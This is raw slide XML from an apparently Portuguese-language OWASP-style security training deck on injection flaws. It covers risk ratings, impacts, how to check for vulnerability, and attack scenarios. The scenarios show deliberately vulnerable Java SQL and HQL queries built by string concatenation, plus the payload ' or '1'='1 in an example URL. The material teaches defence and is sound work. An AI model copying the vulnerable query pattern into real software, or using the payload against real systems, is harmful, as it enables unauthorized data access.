                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Exploração </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>COMUM</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>MÉDIA</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Impacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>SEVERO</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718"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615365">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere alguém que possa enviar dados não-confiáveis para o sistema, incluindo usuários externos, usuários internos, e administradores.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718">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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Atacante envia ataques simples baseados em texto que exploram a sintaxe do</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>interpretador alvo. Praticamente qualquer fonte de dados pode ser um vetor de injeção, incluindo fontes internas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718">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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Falhas de injeção</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ocorrem quando uma aplicação envia dados não-confiáveis para um interpretador. Falhas de injeção estão muito predominantes, particularmente em códigos legados. Elas geralmente são encontradas em consultas SQL, LDAP, Xpath ou NoSQL; comandos do SO; analisadores XML; cabeçalhos SMTP; argumentos do programa, etc. Falhas de injeção são fáceis de descobrir ao examinar o código, mas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>frequentemente difíceis de descobrir através de testes. Escaneadores e fuzzers podem ajudar atacantes a encontrar falhas de injeção.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="800" b="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718">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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injeção pode resultar em perda ou corrupção de dados, falta de responsabilização, ou negação de acesso. Algumas vezes, a injeção pode levar ao comprometimento completo do</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>servidor.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718">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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio dos dados afetados e a plataforma de execução do interpretador. Todos os dados podem ser roubados,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>modificados, ou excluídos. A sua  reputação poderia ser afetada?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45718" marB="45718">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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938" y="6444208"/>
            <a:ext cx="3382962" cy="2699792"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A aplicação utiliza dados não confiáveis na construção da seguinte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chamada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerável</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  custID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De forma similar, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma aplicação confiar cegamente nos frameworks pode resultar em consultas que continuam vulneráveis, (ex., linguagem de consulta Hibernate (HQL)):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Query HQLQuery = session.createQuery(“FROM accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  WHERE custID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ + request.getParameter("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Em ambos os casos, o atacante modifica o valor do parâmetro ‘id’ em seu navegador para enviar:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Por exemplo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isso muda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o significado de ambas as consultas para retornar todos os registros da tabela de contas. Ataques mais perigosos poderiam modificar dados ou até mesmo chamar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procedimentos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>armazenados.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3707904"/>
            <a:ext cx="3382963" cy="2664296"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A melhor forma para descobrir se uma aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>está vulnerável </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>à</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injeção é verificar se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>todos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os usos dos interpretadores separam claramente os dados não-confiáveis do comando ou consulta. Para chamadas SQL, isso significa utilizar variáveis de ligação em todas as instruções preparadas e procedimentos armazenados, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consultas dinâmicas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
